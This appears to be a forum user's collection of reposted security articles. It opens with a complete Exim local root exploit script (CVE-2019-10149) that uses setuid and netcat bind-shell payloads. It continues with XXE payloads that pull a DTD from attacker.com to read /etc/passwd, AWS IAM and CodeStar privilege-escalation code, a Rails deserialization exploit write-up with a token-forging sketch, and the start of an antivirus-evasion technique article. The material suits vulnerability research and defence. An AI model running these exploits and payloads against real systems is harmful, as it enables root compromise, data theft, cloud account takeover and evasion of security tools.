Everything posted by Nytro

  1.

#!/bin/bash
#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
    echo "$0 [-m METHOD]"
    echo
    echo "-m setuid : use the setuid payload (default)"
    echo "-m netcat : use the netcat payload"
    echo
    exit 1
}

# payload delivery
function exploit()
{
    # connect to localhost:25
    exec 3<>/dev/tcp/localhost/25

    # deliver the payload
    read -u 3 && echo $REPLY
    echo "helo localhost" >&3
    read -u 3 && echo $REPLY
    echo "mail from:<>" >&3
    read -u 3 && echo $REPLY
    echo "rcpt to:<$PAYLOAD>" >&3
    read -u 3 && echo $REPLY
    echo "data" >&3
    read -u 3 && echo $REPLY
    for i in {1..31}
    do
        echo "Received: $i" >&3
    done
    echo "." >&3
    read -u 3 && echo $REPLY
    echo "quit" >&3
    read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
while [ ! -z "$1" ]; do
    case $1 in
        -m) shift; METHOD="$1"; shift;;
        * ) usage;;
    esac
done
if [ -z $METHOD ]; then
    usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

    # prepare a setuid shell helper to circumvent bash checks
    echo "Preparing setuid shell helper..."
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
    gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
    if [ $? -ne 0 ]; then
        echo "Problems compiling setuid shell helper, check your gcc."
        echo "Falling back to the /bin/sh method."
        cp /bin/sh /tmp/pwned
    fi
    echo

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_SETUID
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    ls -l /tmp/pwned
    /tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_NETCAT
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    nc -v 127.0.0.1 31337

# print help
else
    usage
fi

Sursa: https://www.exploit-db.com/exploits/46996
  2. Arseniy Sharoglazov – Exploiting XXE with local DTD files

This little technique can force your blind XXE to output anything you want!

Why do we have trouble exploiting XXE in 2k18?

Imagine you have an XXE. External entities are supported, but the server's response is always empty. In this case you have two options: error-based and out-of-band exploitation.

Consider this error-based example.

Request:

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>
<message></message>

Response:

java.io.FileNotFoundException: /nonexistent/
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
daemon:x:2:2:daemon:/:/usr/bin/nologin
(No such file or directory)

Contents of ext.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

See? You are using an external server for payload delivery. What can you do if there is a firewall between you and the target server? Nothing!

What if we just put the external DTD content directly in the DOCTYPE? Some errors will always appear.

Request:

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
    %eval;
    %error;
]>
<message></message>

Response:

Internal Error: SAX Parser Error. Detail: The parameter entity reference "%file;" cannot occur within markup in the internal subset of the DTD.

An external DTD allows us to include one entity inside another, but this is prohibited in the internal DTD. So what can we do with the internal DTD?

To use external DTD syntax in the internal DTD subset, you can bruteforce a local DTD file on the target host and redefine some parameter-entity references inside it.

Request:

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">
    <!ENTITY % condition 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>
    %local_dtd;
]>
<message>any text</message>

Response:

java.io.FileNotFoundException: /nonexistent/
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
daemon:x:2:2:daemon:/:/usr/bin/nologin
(No such file or directory)

Contents of sip-app_1_0.dtd:

...
<!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of">
<!ELEMENT pattern (%condition;)>
...

It works because all XML entities are constant. If you define two entities with the same name, only the first one will be used.

How can we find a local DTD file? Nothing is easier than enumerating files and directories.
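To make that enumeration concrete, here is a minimal Python sketch of probing for local DTD files through a blind XXE endpoint. Everything in it is an assumption about your own setup: the target URL, the XML wrapper the endpoint accepts, and the error string the parser leaks all have to be adapted; the candidate paths would come from public lists of DTD files shipped with common software.

import requests

# Hypothetical names: adjust TARGET, the wrapper and the error
# heuristic to the application you are actually testing.
TARGET = "http://victim.example/xml-endpoint"
CANDIDATES = [
    "/usr/share/yelp/dtd/docbookx.dtd",
    "/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd",
    "/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd",
]

PROBE = """<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file://{path}">
%local_dtd;
]>
<message>test</message>"""

for path in CANDIDATES:
    r = requests.post(TARGET, data=PROBE.format(path=path),
                      headers={"Content-Type": "application/xml"})
    # Heuristic: a nonexistent DTD usually produces a distinct
    # "not found" parser error, while an existing one parses
    # (or fails in a different way).
    if "FileNotFound" not in r.text:
        print("[+] possible local DTD:", path)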
Below are a few more examples of successful applications of this trick.

Custom Linux System:

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa 'Your DTD code'>
%local_dtd;

Custom Windows System:

<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

Thanks to @Mike_n1 from Positive Technologies for sharing this path to an always-existing Windows DTD file.

Cisco WebEx:

<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
<!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

Citrix XenMobile Server:

<!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
<!ENTITY % Body '>Your DTD code<!ENTITY test "test"'>
%local_dtd;

Custom Multi-Platform IBM WebSphere Application:

<!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd">
<!ENTITY % xs-datatypes 'Your DTD code'>
<!ENTITY % simpleType "a">
<!ENTITY % restriction "b">
<!ENTITY % boolean "(c)">
<!ENTITY % URIref "CDATA">
<!ENTITY % XPathExpr "CDATA">
<!ENTITY % QName "NMTOKEN">
<!ENTITY % NCName "NMTOKEN">
<!ENTITY % nonNegativeInteger "NMTOKEN">
%local_dtd;

Timeline:

01/01/2016 — Discovering the technique
12/12/2018 — Writing the article :D
13/12/2018 — Full disclosure

Tags: 2018, DTD, OOB, WAF, XML, XXE

Sursa: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
  3. Escalating AWS IAM Privileges with an Undocumented CodeStar API

June 18, 2019
Spencer Gietzen

Introduction to AWS IAM Privilege Escalation

There is an extensive number of individual APIs available on AWS, which also means there are many ways to misconfigure permissions to those APIs. These misconfigurations can give attackers the ability to abuse APIs to gain more privileges than your AWS administrator originally intended. We at Rhino Security Labs have demonstrated this in the past with our blog post on 17 different privilege escalation methods in AWS.

Most of these privilege escalation methods rely on the IAM service for abuse. An example is the "iam:PutUserPolicy" permission, which allows a user to create an administrator-level inline policy on themselves, making themselves an administrator.
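To illustrate that class of IAM privilege escalation, here is a minimal boto3 sketch of the iam:PutUserPolicy abuse just mentioned. The user name, policy name and profile are placeholders, and the sketch assumes the caller already holds that one permission.

import json
import boto3

# Hypothetical names: "victim-user" is the compromised user and
# "default" is the local credentials profile holding its keys.
iam = boto3.Session(profile_name="default").client("iam")

# With only iam:PutUserPolicy, the user attaches an admin-level
# inline policy to itself, becoming a full administrator.
iam.put_user_policy(
    UserName="victim-user",
    PolicyName="escalation-policy",
    PolicyDocument=json.dumps({
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
    }),
)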
This blog will outline a new method of abuse for privilege escalation within AWS through CodeStar, an undocumented AWS API, as well as two new privilege escalation checks and auto-exploits added to Pacu's "iam__privesc_scan" module.

AWS CodeStar

AWS CodeStar is a service that allows you to "quickly develop, build, and deploy applications on AWS". It integrates a variety of other AWS services and third-party applications (such as Atlassian Jira) to "track progress across your entire software development process". It is essentially a quick, easy way to get your projects up and running with your team in AWS.

CodeStar Undocumented APIs

Like many AWS services, CodeStar has some public-facing APIs that are not publicly documented. In most cases, these exist for convenience when browsing AWS through the web console. For example, CodeStar supports the following APIs, but they are not documented in the official AWS documentation:

codestar:GetTileData
codestar:PutTileData
codestar:VerifyServiceRole

There are more undocumented APIs than are on this list; the other, non-listed APIs are typically used by your web browser to display and verify information in the AWS web console. I discovered these undocumented APIs by simply setting up Burp Suite to intercept my HTTP traffic while browsing the AWS web console and seeing what showed up. [Screenshot: example requests Burp Suite picked up while browsing CodeStar in the AWS web console.]

codestar:CreateProjectFromTemplate

One of the undocumented APIs that we discovered was the codestar:CreateProjectFromTemplate API. This API was created for the web console to allow you to create sample (templated) projects to try out CodeStar. If you look at the documented APIs for CodeStar, you'll only see codestar:CreateProject, but this page references project templates as well.

As long as the CodeStar service role exists in the target account, this single undocumented API allows us to escalate our privileges in AWS. Because this is an undocumented API and people typically don't know it exists, it's likely not granted to any users in AWS directly. This means that although you only need this single permission to escalate privileges, it will likely be granted through a broader set of permissions, such as "codestar:Create*" or "codestar:*" in your IAM permissions. Because those use the wildcard character "*", they expand out to include codestar:CreateProjectFromTemplate. If you needed another reason to stop using wildcards in your IAM policies, this is it.

The following AWS-managed IAM policies grant access to codestar:CreateProjectFromTemplate, but there are likely many more customer-managed IAM policies out there that grant it as well:

arn:aws:iam::aws:policy/AdministratorAccess (obviously)
arn:aws:iam::aws:policy/PowerUserAccess
arn:aws:iam::aws:policy/AWSCodeStarFullAccess
arn:aws:iam::aws:policy/service-role/AWSCodeStarServiceRole

Undocumented CodeStar API to Privilege Escalation

The codestar:CreateProjectFromTemplate permission is the only permission needed to create a project from the variety of templates offered in the AWS web console. The trick here is that these templates are "managed" by AWS, so when you choose one to launch, the CodeStar service role launches the project, not your own permissions. That means you are essentially instructing the CodeStar service role to act on your behalf, and because that service role likely has more permissions than you do, you can utilize them for malicious activity.

As part of these templates, an IAM policy is created in your account named "CodeStarWorker-<project name>-Owner", where <project name> is the name you give the CodeStar project. The CodeStar service role then attaches that policy to your user because you are the owner of that project. Just by doing that, we have already escalated our permissions, because the "CodeStarWorker-<project name>-Owner" policy grants a lot of access. Most permissions are restricted to the resources that the project created, but some are more general (like a few IAM permissions on your own user). There are also other policies and roles that get created as part of this process, some important and some not, so we'll touch on those as we go.

[Screenshot: some of the available templates when creating a CodeStar project through the web console.]

Prior to AWS's Fix

When this vulnerability was originally discovered, the permissions that the "CodeStarWorker-<project name>-Owner" policy granted were slightly different than they are now. Originally, as long as the CodeStar service role existed in the account, an IAM user with only the codestar:CreateProjectFromTemplate permission could escalate to a full administrator of the AWS account.

This was because one of the resources created was an IAM role named "CodeStarWorker-<project name>-CloudFormation", which was used to create a CloudFormation stack to build the project that you chose. It was originally granted full access to 50+ AWS services, including a variety of IAM permissions. A few of the important IAM permissions included:

iam:AttachRolePolicy
iam:AttachUserPolicy
iam:PutRolePolicy

If you have read our blog on AWS privilege escalation, then you already know these permissions can be used to quickly escalate a user or role to a full administrator. For a copy of the old policy that was attached to the "CodeStarWorker-<project name>-CloudFormation" IAM role, visit this link. With that unrestricted access to so many services, you could almost certainly compromise most of your target's resources in AWS, spin up cryptominers, or just delete everything.

To use these permissions, we needed to gain access to the "CodeStarWorker-<project name>-CloudFormation" IAM role. This wasn't difficult, because it was already passed to a CloudFormation stack that the "CodeStarWorker-<project name>-Owner" IAM policy granted us access to. This meant we just needed to update the CloudFormation stack and pass in a template that would use the role's permissions to do something on our behalf.
Due to CloudFormation's limitations, this "something" needed to be an inline policy making that same CloudFormation role an administrator, and a second UpdateStack call then needed to be made to also make your original user an administrator. There were many reasons for this, but essentially it was because you couldn't instruct CloudFormation to attach an existing managed IAM policy to an existing user.

Disclosure and How AWS Fixed the Privilege Escalation

We disclosed this vulnerability to AWS Security on March 19th, 2019, and worked with them to resolve the risk of this attack. Over the next few months, multiple fixes were implemented, because a few bypasses were discovered the first few times. Those bypasses still allowed for full administrator privilege escalation even after the initial fixes, but by working with AWS, we were able to get that resolved. By mid-May 2019, we had confirmation that the vulnerability had been remediated.

Overall, this vulnerability was fixed by limiting the permissions granted to the "CodeStarWorker-<project name>-Owner" IAM policy and the "CodeStarWorker-<project name>-CloudFormation" IAM role. The role was restricted by requiring the use of an IAM permissions boundary in its IAM permissions, which is effective in preventing privilege escalation to a full administrator. Depending on what other resources/misconfigurations exist in the environment, it might still be possible to escalate to full admin access (through a service such as Lambda or EC2) after exploiting this method.

AWS also introduced another fix: the web console now uses "codestar:CreateProject" and "iam:PassRole" to create projects from templates. However, the "codestar:CreateProjectFromTemplate" API is still publicly accessible and enabled, so it can still be abused for privilege escalation (just to a lesser extent than before).

The Attack Vector After the Fix

While the AWS CodeStar team was responsive and implemented several fixes, we were still able to identify a way to use the undocumented API for privilege escalation. This isn't as severe as before AWS implemented their fixes, but it is still noteworthy. The new attack path looks like this:

1. Use codestar:CreateProjectFromTemplate to create a new project. You will be granted access to "cloudformation:UpdateStack" on a stack that has the "CodeStarWorker-<project name>-CloudFormation" IAM role passed to it.
2. Use the CloudFormation permissions to update the target stack with a CloudFormation template of your choice (sketched below). The name of the stack that needs to be updated will be "awscodestar-<project name>-infrastructure" or "awscodestar-<project name>-lambda", depending on what template is used (in the example exploit script, at least).

At this point, you would have full access to the permissions granted to the CloudFormation IAM role. You won't be able to get full administrator with this alone; you'll need other misconfigured resources in the environment to help you do that.
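As a rough illustration of step 2, the UpdateStack call could look like the boto3 sketch below. The template is a hedged example of the pre-fix scenario (having CloudFormation attach an inline policy to its own worker role); the stack, project and region names are placeholders, and a real update would also need to preserve the stack's existing resources.

import boto3

# Hypothetical template: asks CloudFormation (running as the
# CodeStarWorker-<project name>-CloudFormation role) to attach an
# inline policy to that same role. Post-fix, a permissions boundary
# limits what such a policy can actually grant.
TEMPLATE = """
Resources:
  EscalationPolicy:
    Type: AWS::IAM::Policy
    Properties:
      PolicyName: escalation
      Roles:
        - CodeStarWorker-PROJECTNAME-CloudFormation
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Action: "*"
            Resource: "*"
"""

cfn = boto3.Session(profile_name="default").client(
    "cloudformation", region_name="us-east-1")
cfn.update_stack(
    StackName="awscodestar-PROJECTNAME-lambda",  # placeholder stack name
    TemplateBody=TEMPLATE,
    Capabilities=["CAPABILITY_NAMED_IAM"],
)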
Automation and Exploitation with Pacu

This privilege escalation method has been integrated into Pacu's "iam__privesc_scan" module, so you can check which users/roles are vulnerable within your account. To check your account for privilege escalation (all 17+ methods we have blogged about, including this one) from a fresh Pacu session, you can run the following commands from the Pacu CLI:

1. import_keys default: import the "default" profile from the AWS credentials file (~/.aws/credentials)
2. run iam__enum_users_roles_policies_groups --users: enumerate IAM users
3. run iam__enum_permissions --all-users: enumerate their permissions
4. run iam__privesc_scan --offline: check for privilege escalation methods

As you can see, two IAM users were found and had their permissions enumerated. One of them was already an administrator, and the other user, "VulnerableUser", is vulnerable to the "CodeStarCreateProjectFromTemplate" privilege escalation method.

Two Bonus Privilege Escalations Added to Pacu

With this blog release and Pacu update, we also added two more checks to the "iam__privesc_scan" module, both with auto-exploitation available. The first method is "PassExistingRoleToNewCodeStarProject", which uses "codestar:CreateProject" and "iam:PassRole" to escalate an IAM user or role to a full administrator. The second method is "CodeStarCreateProjectThenAssociateTeamMember", which uses "codestar:CreateProject" and "codestar:AssociateTeamMember" to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions.

Pacu can be found on our GitHub with the latest updates pushed, so we suggest using it to check your own environment for any of these new privilege escalations.

CreateProjectFromTemplate Exploit Script

This privilege escalation method did not have auto-exploitation integrated into Pacu because it is an undocumented API, and thus unsupported in the "boto3" Python library. Instead, an exploit script was derived from AWS's guide on manually signing API requests in Python. The standalone exploitation script can be found here.

The script has the option of using two different templates, one of which grants more access than the other, but that one requires that you know the ID of a VPC, the ID of a subnet in that VPC, and the name of an SSH key pair in the target region. It's possible to collect some of that information by running the exploit script without it, using the escalated permissions to enumerate that information, then re-running the exploit script with the data you discovered.

Using the Script

The only permission required to run the script is "codestar:CreateProjectFromTemplate", but you must be a user (not a role) because of how CodeStar works.

Without prior information, you can run the script like this, which will use the default AWS profile:

python3 CodeStarPrivEsc.py --profile default

With the EC2/VPC information, you can run the script like this:

python3 CodeStarPrivEsc.py --profile default --vpc-id vpc-4f1d6h18 --subnet-id subnet-2517b823 --key-pair-name MySSHKey

There should be quite a bit of output, but at this point you will just be waiting for the CloudFormation stacks to spin up in the environment and create all the necessary resources. Right away, you'll gain some additional privileges through the "CodeStar_<project name>_Owner" IAM policy, but if you wait, additional versions of that policy will be created as other resources in the environment are created. The script will output the AWS CLI command you need to run to view your own user's permissions once the privilege escalation is complete.
That command will look something like this (pay attention, though, because the version ID will change depending on the template you are using):

aws iam get-policy-version --profile default --policy-arn arn:aws:iam::ACCOUNT-ID:policy/CodeStar_PROJECTNAME_Owner --version-id v3

It might take some time for that command to execute successfully while everything gets spun up in the environment, but once it executes successfully, the privilege escalation process is complete.

Utilizing Your New Permissions

You'll now have all the permissions that the policy you just viewed grants, and as part of that, you are granted the "cloudformation:UpdateStack" permission on a CloudFormation stack that has already had the "CodeStarWorker-<project name>-CloudFormation" IAM role passed to it. That means you can use that role for what you want, without ever needing the "iam:PassRole" permission. The permissions granted to this role should be the same every time (unless AWS updates the template behind the scenes), and you won't have permission to view them.

Without prior information: visit this link to see what the access looks like.
With the EC2/VPC information: visit this link to see what the access looks like.

The script will also output the command to use to update the CloudFormation stack that you want to target. That command will look like this:

aws cloudformation update-stack --profile default --region us-east-1 --stack-name awscodestar-PROJECTNAME-lambda --capabilities "CAPABILITY_NAMED_IAM" --template-body file://PATH-TO-CLOUDFORMATION-TEMPLATE

Without prior information: the stack's name will be "awscodestar-<project name>-lambda".
With the EC2/VPC information: the stack's name will be "awscodestar-<project name>-infrastructure".

Just create a CloudFormation template to create/modify the resources that you want, and run that UpdateStack command to take control of the CloudFormation role.

Video Example

The following video shows a user who is only granted the "codestar:CreateProjectFromTemplate" permission escalating their permissions with the exploit script. The video only shows part 1 of 2 of the full attack process, because the next step depends on what your goal is. After the privilege escalation shown in this video is done, the next step would be to take control of the CloudFormation IAM role and abuse its permissions. The first step of the privilege escalation grants you access to a few things, including control over that CloudFormation role. Then, because the CloudFormation role has more access than you do, you can instruct it to perform an action on your behalf, whatever that may be.

Note that around the 1-minute mark we cut out a few minutes of refreshing the browser. It takes time for the resources to deploy, and the privilege escalation is not complete until all of them deploy, so there is a bit of waiting required.

Defending Against Privilege Escalation through CodeStar

There are a few key points to defending against this privilege escalation method in an AWS environment:

- If you don't use CodeStar in your environment, ensure that the CodeStar IAM service role is removed from, or never created in, your account (the default name is "aws-codestar-service-role").
- Implement the principle of least privilege when granting access to your environment. This entails avoiding the use of wildcards in IAM policies where possible, so that you can be 100% sure what APIs you are granting your users access to.
- Do not grant CodeStar permissions to your users unless they require it.
- Be careful granting CodeStar permissions through wildcards when users do require it, so that they aren't granted the "codestar:CreateProjectFromTemplate" permission.
- If a user must be granted "codestar:CreateProject" and "iam:PassRole" (and/or "codestar:AssociateTeamMember"), be sure that sufficient monitoring is in place to detect any privilege escalation attempts.

Conclusion

The CodeStar undocumented API vulnerability has, for the most part, been fixed, but it is still a good idea to implement the defense strategies outlined above. This type of vulnerability may not be limited to CodeStar: there might be other undocumented APIs for other AWS services that are abusable like this one. Many undocumented APIs were discovered in just the short amount of time it took to find this vulnerability. Some of these undocumented APIs can be beneficial for attackers, while others might be useless. Either way, it is always useful as an attacker to dig deep and figure out what APIs exist and which ones are abusable. As a defender, it is necessary to keep up with the attackers to defend against unexpected and unknown attack vectors. Following best practices, such as not using wildcards when granting permissions, is also a great way to avoid this vulnerability.

We'll be at re:Inforce next week, with two more big releases coming before the event. We'll also be teaming up with Protego and handing out copies of our AWS pentesting book to the first 50 people each day of the event.

Sursa: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/
  4. Remote Code Execution via Ruby on Rails Active Storage Insecure Deserialization

June 20, 2019 | Guest Blogger

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team detail a recent code execution vulnerability in Ruby on Rails. The bug was originally discovered and reported by the researcher known as ooooooo_q. The following is a portion of their write-up covering CVE-2019-5420, with a few minimal modifications.

An insecure deserialization vulnerability has been reported in the Active Storage component of Ruby on Rails. This vulnerability is due to deserializing a Ruby object within an HTTP URL using Marshal.load() without sufficient validation.

The Vulnerability

Rails is an open-source web application Model View Controller (MVC) framework written in the Ruby language. Rails is built to encourage software engineering patterns and paradigms such as convention over configuration (CoC), don't repeat yourself (DRY), and the active record pattern. Rails ships as a set of individual components. Rails 5.2 also ships with Active Storage, which is the component of interest for this vulnerability. Active Storage is used to store files and associate those files with Active Record. It is compatible with cloud storage services such as Amazon S3, Google Cloud Storage, and Microsoft Azure Storage.

Ruby supports serialization of objects to JSON, YAML, or the Marshal serialization format. The Marshal serialization format is implemented by the Marshal class; objects are serialized via the dump() method and deserialized via the load() method. The Marshal serialization format uses a type-length-value representation to serialize objects.

Active Storage adds a few routes by default to the Rails application. Of interest to this report are the two routes responsible for downloading and uploading files, respectively. This component uses ActiveSupport::MessageVerifier to ensure the integrity of the :encoded_key and :encoded_token variables carried in those routes. In normal use, these variables are generated by MessageVerifier.generate(), and their <base64-message> part contains a base64-encoded JSON object describing the blob.

When a GET or PUT request is sent to a URI that contains "/rails/active_storage/disk/", the :encoded_key and :encoded_token variables are extracted. These variables are expected to have been generated by MessageVerifier.generate(), hence decode_verified_key and decode_verified_token call MessageVerifier.verified() to check the integrity of the message and deserialize it. Integrity is checked by calling ActiveSupport::SecurityUtils.secure_compare(digest, generate_digest(data)). The digest is generated by signing the data with a MessageVerifier secret. For Rails applications in development, this secret is always the application name, which is publicly known. For Rails applications in production, the secret is stored in a credentials.yml.enc file, which is encrypted using a key in master.key. The contents of these files can be disclosed using CVE-2019-5418.

Once the integrity check passes, the message is base64 decoded and Marshal.load() is called on the resulting byte stream without any further validation.
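To see why a recoverable secret is fatal here, below is a hedged Python sketch of what forging a MessageVerifier token amounts to, assuming the verifier's default construction (a base64 payload, a "--" separator, and an HMAC-SHA1 hex digest); the exact payload framing can differ per Rails version and verifier options. The secret and the Marshal bytes are placeholders: the gadget bytes themselves would be produced with Ruby's Marshal.dump(), as the Metasploit module does.

import base64
import hashlib
import hmac

def forge_token(marshal_payload: bytes, secret: bytes) -> str:
    """Build a token in MessageVerifier's default shape, assuming
    its default SHA1 digest and a known/recovered secret."""
    data = base64.b64encode(marshal_payload)
    digest = hmac.new(secret, data, hashlib.sha1).hexdigest()
    return data.decode() + "--" + digest

# Placeholders: a real payload is a Marshal-serialized gadget chain
# (b"\x04\x08" is the Marshal format version header).
print(forge_token(b"\x04\x08...", b"recovered-secret"))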
An attacker can exploit this condition by embedding a dangerous object, such as ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy, to achieve remote code execution. CVE-2019-5418 needs to be chained with CVE-2019-5420 to ensure all conditions are met to achieve code execution. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request embedding malicious serialized objects to a vulnerable application. Successful exploitation results in arbitrary code execution under the security context of the affected Ruby on Rails application.

Source Code Walkthrough

The relevant code snippets, taken from Rails version 5.2.1, are in activesupport/lib/active_support/message_verifier.rb and activestorage/app/controllers/active_storage/disk_controller.rb (comments added by Trend Micro are highlighted in the original report).

The Exploit

There is a publicly available Metasploit module demonstrating this vulnerability. The following stand-alone Python code may also be used. The usage is simply:

python poc.py <host> [<port>]

Please note our Python PoC assumes that the application name is "Demo::Application".

The Patch

This vulnerability received a patch from the vendor in March 2019. In addition to this bug, the patch also provides fixes for CVE-2019-5418, a file content disclosure bug, and CVE-2019-5419, a denial-of-service bug in Action View. If you are not able to immediately apply the patch, this issue can be mitigated by specifying a secret key in development mode. In the config/environments/development.rb file, add the following:

config.secret_key_base = SecureRandom.hex(64)

The only other salient mitigation is to restrict access to the affected ports.

Conclusion

This bug exists in versions 6.0.0.X and 5.2.X of Rails. Given that this vulnerability received a CVSS v3 score of 9.8, users of Rails should definitely look to upgrade or apply the mitigations soon.

Special thanks to Sivathmican Sivakumaran and Pengsu Cheng of the Trend Micro Security Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Security Research services, please visit http://go.trendmicro.com/tis/. The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the ZDI team for the latest in exploit techniques and security patches.

Sursa: https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization
  5. In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass

By Eoin Carroll, Cedric Cochin, Steve Povolny and Steve Hearnden on Jun 20, 2019

Process Reimaging Overview

The Windows operating system has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts the ability of non-EDR (Endpoint Detection and Response) endpoint security solutions, such as Microsoft Defender Realtime Protection, to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee's Advanced Threat Research to develop a new post-exploitation evasion technique we call "Process Reimaging". This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre ATT&CK Defense Evasion category; however, it is much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work against any endpoint security vendor or product implementing the APIs discussed below.

The Windows kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support user-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into their infrastructure. The Windows kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification.

We have developed a proof of concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE. The PoC allowed us to persist a malicious process (post-exploitation) which does not get detected by Windows Defender. The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and blocks it on disk before process creation, or until it performs a full scan on the suspect machine post-compromise to detect the file on disk.

In addition to Process Reimaging weaponization and protection recommendations, this blog includes a technical deep dive on reversing the Windows kernel APIs for process attribute verification and the Process Reimaging attack vectors. We use the SynAck ransomware as a case study to illustrate Process Reimaging's impact relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender's ability to detect Process Hollowing or Doppelganging, but to the subverting of trust for process attribute verification.

Antivirus Scanner Detection Points

When an antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time. The actual sequence for loading an image is as follows:

1. FileCreate – the file is opened to be able to be mapped into memory.
2. Section Create – the file is mapped into memory.
3. Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO.
4. ImageLoad – the file is loaded.
5. CloseFile – the file is closed.

